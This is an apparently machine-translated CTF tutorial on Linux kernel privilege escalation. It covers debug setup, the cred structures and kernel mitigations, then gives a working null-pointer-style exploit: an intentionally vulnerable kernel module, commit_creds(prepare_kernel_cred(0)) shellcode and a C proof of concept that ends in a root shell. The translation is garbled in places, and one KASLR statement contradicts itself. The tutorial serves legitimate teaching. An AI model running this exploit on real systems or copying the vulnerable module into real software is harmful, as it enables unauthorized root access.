instructions

This series of articles mainly starts from CTF competition, and explains the vulnerability analysis, mining and exploitation of Linux kernel. This article mainly introduces the pre-knowledge and preparation for kernel vulnerability exploitation.

Linux kernel mode and user mode

The following uses An Intel CPU as an example. Intel classifies the permissions of CPU instruction set operations into four levels in descending order: Ring 0 (usually referred to as the kernel state, the CPU can access all the data in memory, including peripheral devices, such as hard disks, network cards, and the CPU can switch itself from one program to another) ring 1 (reserved) Ring 2 (reserved) Ring 3 (usually referred to as the user state, only limited access to memory, And do not allow access to peripheral devices) as shown below:

The inner ring has higher CPU privileges, and the inner ring can freely access the resources of the outer ring, while the outer ring is prohibited.

Therefore, kernel-mode vulnerabilities are more destructive than user-mode vulnerabilities, and gaining access to the kernel is basically equivalent to controlling the entire operating system.

Build Linux kernel analysis environment

If simply structures, the analysis of the kernel debugging environment, generally need to manually download the corresponding version of the kernel and compiled, can be downloaded from the kernel’s official website, here the author under the 4.19 kernel version, when compiling the installation process may encounter module missing problem, corresponding module can be used on ubuntu apt to install, The author manually installed modules locally as follows:

install libncurses5-dev\
sudo apt-get install flex\
sudo apt-get install bison\
sudo apt-get install libopenssl-dev
Copy the code

Start by using make MenuConfig to generate the default config file. This is a graphical configuration that enables some debugging options in kernel hacking options to better analyze kernel vulnerabilities. Linux Insides: Linux Insides: Linux Insides: Linux Insides: Linux Insides: Linux Insides: Linux Insides: Linux

The default compilation generates multiple files, including vmLinux, system.map, bzImage, etc. The bzImage file is mainly focused here because it is a loadable kernel image file. The default x86 architecture is generated in the arch/x86/boot directory. Generally speaking, CTF questions will provide the corresponding kernel image file, startup script, root file system and other three files, which can basically load the entire operating system through QEMU for subsequent analysis and debugging.

After downloading the source code, use make Menuconfig to control the build options. Select static binary from build Options. Then run make install to generate an _install directory in the current directory, which stores the compiled files. After that, use the following script to initialize the contents required by the system running in the _install directory.

#! /bin/sh\ mkdir -pv {bin,sbin,etc,proc,sys,usr/{bin,sbin}}\ echo """#! /bin/sh\ mount -t proc none /proc\ mount -t sysfs none /sys\ mount -t debugfs none /sys/kernel/debug\ mkdir /tmp\ mount -t tmpfs none /tmp\ mdev -s\ exec /bin/sh""">>init\ chmod +x initCopy the code

Then switch to the _install directory and use compressed instruction find. | cpio – o – format = newc. >. /rootfs.cpio packages everything in the _install directory so that the entire kernel can be run using qemu from bzImage and rootfs.cpio. Run the following command: \

qemu-system-x86_64 -kernel ./bzImage -initrd ./rootfs.cpio -s -append "nokaslr"
Copy the code

The -s parameter allows GDB to debug the kernel through a remote network connection. GDB breaks as follows:

It is now possible to break any function that contains symbols. For an initial test, here is a breakpoint on new_sync_read, which is triggered when a user enters a command, as follows:

Such a basic kernel debugging analysis environment has been set up.

How do I lift weights in the kernel environment* * * *

The basic concept

User For the Linux system that supports multitasking, a user is the credential to obtain resources, and in essence, the ownership of the assigned permissions.

Permissions Permissions control users’ access to computer resources, such as CPUS, memory, and files.

Processes Processes are a fundamental concept in any operating system that supports multiprogramming. A process is usually defined as an instance of the execution of a program. In fact, processes help us accomplish tasks. The actions performed by the user are actually performed by the process with the user’s identity information.

Process permissions Since the process performs specific operations for users, the process must be granted permissions when users want to access system resources. That is, a process must carry the identity of the user who initiated the process in order to perform legitimate operations.

The kernel structure

All of the kernel’s algorithms for processes and programs are built around a single data structure called task_struct. For Linux, the task_struct data descriptor for all processes is linked into a single list. The data structure defined in include/sched. J h, part of the structure is as follows: (reference blog.csdn.net/u012489236/…

Focus only on the process PID and permission control CRED structure.

Pid type definitions are mainly included in include/ Linux /pid. H, including the following in 4.19:

enumpid_type\
{\
    PIDTYPE_PID,\
    PIDTYPE_TGID,\
    PIDTYPE_PGID,\
    PIDTYPE_SID,\
    PIDTYPE_MAX,\
};
Copy the code

You can run the following command to view the information:

Admins @ admins -- virtual machine: ~ / kernel/Linux - 4.19 $ps - T - eo dar, pid, a pgid, tgid, sid, comm \ dar pid a pgid tgid sid COMMAND \ 1  1 1 1 1 systemd\ 2 2 0 2 0 kthreadd\ 3 3 0 3 0 rcu_gp\ 4 4 0 4 0 rcu_par_gp\ 6 6 0 6 0 kworker/0:0H-kb\ 8 8 0 8 0 mm_percpu_wq\ 9 9 0 9 0 ksoftirqd/0\ 10 10 0 10 0 rcu_sched\ 11 11 0 11 0 rcu_bh\ 12 12 0 12 0 migration/0Copy the code

When using GDB for remote debugging, in order to get the task_struct structure of the current process, we need to get the pid of the current process and the kernel global variable init_task, which holds the address of the task_strcut structure of the initial kernel task. The task_struct structure contains a circular list of tasks that keep track of all processes in the task_struct structure. Therefore, we can iterate over all task_structs and compare pid values to determine whether they are our own processes. We can use the following script:

#Helper functionto find a task given a PID or the\ #address of a task_struct.\ #The result is set into $t\ define find_task\ if((unsigned)$arg0 > (unsigned)&_end)\ set$t=(struct task_struct *)$arg0\ else\ set $t=&init_task\ if(init_task.pid ! = (unsigned)$arg0)\ find_next_task $t\ while(&init_task! =$t && $t->pid ! = (unsigned)$arg0)\ find_next_task $t\ end\ if ($t ==&init_task)\ printf"Couldn't find task; using init_task\n"\ end\ end\ end\ p $t\ p *(structtask_struct*)$t\ p *(conststruct cred*)$t->cred\ end\ \ define find_next_task\ # Given a taskaddress, find the next task in the linked list\ set $t =(struct task_struct *)$arg0\ set $offset=((char *)&$t->tasks - (char *)$t)\ set $t=(structtask_struct *)( (char *)$t->tasks.next- (char *)$offset)\ endCopy the code

The task_struct structure and creD contents of the corresponding process can be viewed after executing find_taskpid:

$5 = {\ usage = {\ counter =0x2\ },\ uid = {\ val = 0x0\ },\ gid = {\ val = 0x0\ },\ suid = {\ val = 0x0\ },\ sgid = {\ val = 0x0\ },\ euid = {\ val = 0x0\ },\ egid = {\ val = 0x0\ },\ fsuid = {\ val = 0x0\ },\ fsgid = {\ val = 0x0\ },\ Securebits =0x0,\ cap_inheritable ={\ cap ={0x0,0x0}\},\ cap_permitted= {\ cap ={0xffFFFFFF, 0x3f}\ },\ cap_effective= {\ cap ={0xffffffff, 0x3f}\ },\ cap_bset = {\ cap ={0xffffffff, 0x3F}\},\ cap_ambient ={\ cap ={0x0,0x0}\},\ jit_keyring =0x0,\ session_keyring =0x0 < irq_STACK_UNION >,\ process_keyring = 0x0 <irq_stack_union>,\ thread_keyring= 0x0 <irq_stack_union>,\ request_key_auth = 0x0 <irq_stack_union>,\ security =0xffff88000714b6a0,\ user =0xffffffff82653f40 <root_user>,\ user_ns =0xffffffff82653fe0 <init_user_ns>,\ group_info =0xffffffff8265b3c8 <init_groups>,\ rcu = {\ next = 0x0<irq_stack_union>,\ func = 0x0 <irq_stack_union>\ }\ }\ $6 = (struct task_struct *) 0xffff880006575700Copy the code

Of course, during debugging, we can obtain the task_struct structure of the corresponding process more quickly in this way. When writing shellcode, we usually obtain the task_struct structure by register value or directly calling related functions. Here we can refer to the two ways mentioned in this book. The ESP or GS registers are used to retrieve the task_struct structure of the current process.

register unsigned long current_stack_pointer asm("esp")\ static inline struct thread_info *current_thread_info(void)\ {\  return (struct thread_info *)(current_stack_pointer & ~(THREAD_SIZE- 1)); \ }\ static __always_inline struct task_struct * get_current(void)\ {\ returncurrent_thread_info()->task; \ }\ struct thread_info {\ struct task_struct *task; /* main task structure */\ struct exec_domain *exec_domain; /* execution domain */\ unsigned long flags; /* low level flags */\ __u32 status; /* Thread synchronousFlags */\... }Copy the code

Of course, during debugging, we can obtain the task_struct structure of the corresponding process more quickly in this way. When writing shellcode, we usually obtain the task_struct structure by register value or directly calling related functions. Here we can refer to the two ways mentioned in this book. The ESP or GS registers are used to retrieve the task_struct structure of the current process.

register unsigned long current_stack_pointer asm("esp")\ static inline struct thread_info *current_thread_info(void)\ {\  return (struct thread_info *)(current_stack_pointer & ~(THREAD_SIZE- 1)); \ }\ static __always_inline struct task_struct * get_current(void)\ {\ returncurrent_thread_info()->task; \ }\ struct thread_info {\ struct task_struct *task; /* main task structure */\ struct exec_domain *exec_domain; /* execution domain */\ unsigned long flags; /* low level flags */\ __u32 status; /* Thread synchronousFlags */\... }Copy the code

All the above is in the 32-bit environment of the search way, in the 64-bit way or through the GS register, the code is as follows:

.text:FFFFFFFF810A77E0__x64_sys_getuid proc near ; DATA XREF:.rodata: ffffff820004f0 ↓o\. Text :FFFFFFFF810A77E0; Rodata: FFFFFFFF82001BD8 left o... \ .text:FFFFFFFF810A77E0 call __fentry__ ; Alternative name is '__ia32_sys_getuid'\ .text:FFFFFFFF810A77E5 push rbp\ .text:FFFFFFFF810A77E6 mov rax, gs:current_task\ .text:FFFFFFFF810A77EF mov rax, [rax+0A48h]\ .text:FFFFFFFF810A77F6 mov rbp, rsp\ .text:FFFFFFFF810A77F9 mov esi, [rax+4]\ .text:FFFFFFFF810A77FC mov rdi, [rax+88h]\ .text:FFFFFFFF810A7803 call from_kuid_munged\ .text:FFFFFFFF810A7808 mov eax, eax\ .text:FFFFFFFF810A780A pop rbp\ .text:FFFFFFFF810A780B retn\ .text:FFFFFFFF810A780B __x64_sys_getuid endpCopy the code

Elevated privileges

A task_struct contains a number of cred structs, such as the following:

/* Processcredentials: */\ \ /* Tracer's credentials at attach: */\ conststruct cred __rcu *ptracer_cred; \ \ /* Objective and real subjective task credentials (COW): */\ conststruct cred __rcu *real_cred; \ \ /* Effective (overridable) subjective task credentials (COW):*/\ conststruct cred __rcu *cred;Copy the code

More important are real_CREd and CRED, which represent the relationship between the host and object in the Credential mechanism in the Linux kernel. The subject provides the certificate with its own permission, and the object provides the certificate to access the required permission. According to the certificate and operation provided by the subject and object, the cred represents the principal certificate. Real_cred represents the object certificate, and the creD structure is as follows:

struct cred {\ atomic_t usage; \ #ifdef CONFIG_DEBUG_CREDENTIALS\ atomic_t subscribers; /* number of processes subscribed */\ void *put_addr; \ unsigned magic; \ #define CRED_MAGIC 0x43736564\ #define CRED_MAGIC_DEAD0x44656144\ #endif\ kuid_t uid; /* real UIDof the task */\ kgid_t gid; /* real GIDof the task */\ kuid_t suid; /* saved UIDof the task */\ kgid_t sgid; /* saved GIDof the task */\ kuid_t euid; /* effectiveUID of the task */\ kgid_t egid; /* effectiveGID of the task */\ kuid_t fsuid; /* UID for VFS ops */\ kgid_t fsgid; /* GID for VFS ops */\ unsigned securebits; /* SUID-less security management */\ kernel_cap_t cap_inheritable; /* caps our children can inherit*/\ kernel_cap_t cap_permitted; /* caps we're permitted */\ kernel_cap_t cap_effective; /* caps we can actually use */\ kernel_cap_t cap_bset; /* capability bounding set */\ kernel_cap_t cap_ambient; /* Ambient capability set */\ #ifdef CONFIG_KEYS\ unsignedcharjit_keyring; /* default keyring to attach requested\ * keys to */\ struct key __rcu *session_keyring; /*keyring inherited over fork */\ struct key*process_keyring; /*keyring private to this process */\ struct key*thread_keyring; /*keyring private to this thread */\ struct key*request_key_auth; /*assumed request_key authority */\ #endif\ #ifdef CONFIG_SECURITY\ void *security; /* subjective LSM security */\ #endif\ struct user_struct *user; /* real user ID subscription */\ struct user_namespace *user_ns; /*user_ns the caps and keyrings are relative to. */\ struct group_info *group_info; /* supplementary groups for euid/fsgid*/\ struct rcu_head rcu; /* RCU deletion hook */\ } __randomize_layout;Copy the code

Commit_creds (prepare_kernel_cred(0)), Prepare_kernel_cred (0) is responsible for generating a CRED structure with root permissions (essentially retrieving the CRED structure of init process 0), while commit_CREds () is responsible for replacing the corresponding CRED structure. This gives the current process root privileges, and interested students can read the source code of the two functions.

In our default environment, KASLR is enabled, so the addresses of these two functions are fixed. We can analyze the executable kernel file VMLinux through IDA and other tools, and search for commit_CREds functions after successful loading, as follows:

text:FFFFFFFF810B9810 commit_creds proc near ; 290 write CODE XREF: sub_FFFFFFFF810913D5 + p \. Text: FFFFFFFF810B9810; Sub_FFFFFFFF8109D865 + 15 a write p... \ .text:FFFFFFFF810B9810 E8 3B 7F B4 00 call __fentry__\ .text:FFFFFFFF810B9815 55 push rbp\ .text:FFFFFFFF810B9816 48 89 E5 mov rbp, rsp\ .text:FFFFFFFF810B9819 41 55 push r13\ .text:FFFFFFFF810B981B 41 54 push r12\ .text:FFFFFFFF810B981D 53 push rbxCopy the code

The __fentry__ function returns only, and therefore can be considered as a NOP instruction, so commit_CREds essentially starts with FFFFFFFF810B9815. Of course, select 0xFFFFFFFF810B9810 as the commit_CREds address. The prepare_kernel_cred function is as follows:

text:FFFFFFFF810B9C00                   prepare_kernel_cred procnear           ; CODE XREF:\
.text:FFFFFFFF810B9C00 E8 4B 7B B4 00                    call    __fentry__\
.text:FFFFFFFF810B9C05 55                                push    rbp\
.text:FFFFFFFF810B9C06 BE C0 00 60 00                    mov     esi, 6000C0h\
.text:FFFFFFFF810B9C0B 48 89 E5                          mov     rbp, rsp\
.text:FFFFFFFF810B9C0E 41 54                             push    r12\
.text:FFFFFFFF810B9C10 49 89 FC                          mov     r12, rdi\
.text:FFFFFFFF810B9C13 48 8B 3D 26 26 AD+                mov     rdi, cs:cred_jar\
.text:FFFFFFFF810B9C13 01\
.text:FFFFFFFF810B9C1A 53                                push    rbx\
.text:FFFFFFFF810B9C1B E8 00 68 1B 00                    call    kmem_cache_alloc\
.text:FFFFFFFF810B9C20 48 85 C0                          test    rax, rax\
.text:FFFFFFFF810B9C23 0F 84 E2 00 00 00                 jz      loc_FFFFFFFF810B9D0B\
.text:FFFFFFFF810B9C29 4D 85 E4                          test    r12, r12\
.text:FFFFFFFF810B9C2C 48 89 C3                          mov     rbx, rax\
.text:FFFFFFFF810B9C2F 0F 84 AB 00 00 00                 jz      loc_FFFFFFFF810B9CE0
Copy the code

So choose 0xFFFFFFFF810B9C00 as the prepare_kernel_CREd address, and a simple shellcode will look like this:

xor rdi,rdi\
mov rbx,0xFFFFFFFF810B9C00\
call rbx\
mov rbx,0xFFFFFFFF810B9810\
call rbx\
ret
Copy the code

Of course, there are other ways to get the address of a function, such as through the debugger or /proc/kallsyms, which I won’t go into here.

Of course, there are other ways to promote permissions. The system usually determines the permissions of a process by checking the UID, GID, and fsGID in the CRED structure. If all of them are 0, the system defaults to root. Therefore, we can locate the CRED structure of the current process and modify its internal data content to achieve the purpose of lifting weights.

The sample

The basic concept

The basic feature of the Linux kernel is that all the operations of the kernel are concentrated in one executable file. This advantage is that modules can be directly called without communication, which effectively improves the running speed of the kernel, but the disadvantage is the lack of scalability. As a result, Linux has improved and introduced loadable kernel modules (LKMS) since version 2.6, which can load independent executable modules into the kernel and facilitate the extension of kernel functions. Loadable kernel modules are typically manipulated with the following commands:

Insmod load kernel module lsmod list kernel module rmod unload kernel module

In CTF competitions, most questions will choose a kernel module with vulnerabilities, and the players need to analyze the module and make targeted exploit of the vulnerabilities.

2. Protection mechanism A. Kaslr Kernel space address randomization, similar to ASLR of user layer

B. Stack protector similar to stack canary on the user layer, cookies are added to the kernel stack to protect against stack overflow

C. SMAP management mode access protection prevents the kernel layer from accessing user-mode data

D. SMEP management mode execution protection prevents the kernel layer from executing user-mode code

E. MMAP_MIN_ADDR Specifies the minimum address that the mmap function can apply for. The vulnerability of the null pointer type cannot be exploited

F. KPTI kernel page table isolation, the main purpose is to mitigate CPU side channel attacks and KASLR bypassing

3. Interaction between user and kernel a. Syscall Between user space and kernel space, there is an intermediate layer called SYSCall (System call), which is the bridge between user and kernel state. This not only improves the security of the kernel, but also facilitates portability, requiring only the implementation of the same set of interfaces. In Linux, the user space issues Syscall to the kernel space to generate a soft interrupt, so that the program falls into the kernel state and performs the corresponding operation

B. Iotcl is essentially a system call, but it is used to send or receive instructions and data directly to the driver device.

C. Open, Read, and write The driver is mapped as a file. Therefore, you can access the file to operate the driver

4. The hole type a. UNINITIALIZED/NONVALIDATED CORRUPTEDPOINTER null pointer DEREFERENCE core solutions for reference

B. MEMORY CORRUPTION

C. INTEGER ISSUES (arithmetic) INTEGER overflow and symbol conversion

D. RACE CONDITIONS double fetch vulnerability

This time, a null pointer dereference vulnerability is used for kernel weight lifting. The source code of the module is as follows:

#include <linux/init.h>\ #include <linux/module.h>\ #include <linux/kernel.h>\ #include <linux/proc_fs.h>\ #include <linux/seq_file.h>\ void(*my_funptr)(void)=0x10000; \ \ ssize_t nullp_write(struct file *file,constchar __user *buf,size_t len,loff_t*loff)\ {\ my_funptr(); \ return len; \ }\ staticint __init null_dereference_init(void)\ {\ printk(KERN_ALERT "null_dereference driver init! n"); \ staticconststruct file_operationsmytest_proc_fops ={\ .write = nullp_write,\ \ }; \ \ proc_create (" test_kernel_npd ", 0666, 0, & mytest_proc_fops); \ return0; \ }\ staticvoid __exitnull_dereference_exit(void)\ {\ printk(KERN_ALERT "null_dereference driver exitn"); \ }\ module_init(null_dereference_init); \ module_exit(null_dereference_exit);Copy the code

Although it is said to be null pointer dereference, in fact, due to the MMAP_MIN_ADDR mitigation mechanism in the Linux kernel, the user layer failed to apply for address 0 through the mmap function, so the address of the function to be called was changed to 0x10000, so that the user layer can also control this address, which is convenient to exploit the vulnerability later.

The default busybox root file system cannot add other users through adduser. Therefore, I directly used Ubuntu16 Base as the root file system and added a test user to check whether the rights were successfully raised. After starting the system, load the kernel module with vulnerability through insmod command as follows:

Then switch to user test by su test as follows:

The poC code is as follows. After compiling, it has been put in the root file system directory in advance

#include<sys/types.h>\ #include <sys/stat.h>\ #include <fcntl.h>\ #include <stdio.h>\ #include <stdlib.h>\ #include <sys/mman.h>\ unsignedchar* mypoc ="H1\xffH\xc7\xc3\x00\x9c\x0b\x81\xff\xd3H\xc7\xc3\x10\x98\x0b\x81\xff\xd3\xc3"; \ \ int main () {\ void * addr0 = mmap (0 x10000, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 1, 0). \ memcpy(addr0,mypoc,24); \ int mfd = open("/proc/test_kernel_npd",O_RDWR); \ int res= write(mfd,"run shellcode",14); \ system("/bin/bash"); \ return0; The \}Copy the code

The result is as follows:

At this point you can see that the rights have been successfully raised.

Refer to the link

1.【 series sharing 】Linux kernel vulnerability exploit tutorial (ii) : Two Demo – security guest, security information platform (anquanke.com)

2. Kernel PWN from Scratch – I: Linux Kernel Easy To Eat Guide – Security Guest, Security information platform (anquanke.com)

For more information, please pay attention to the “Moyun Security” public account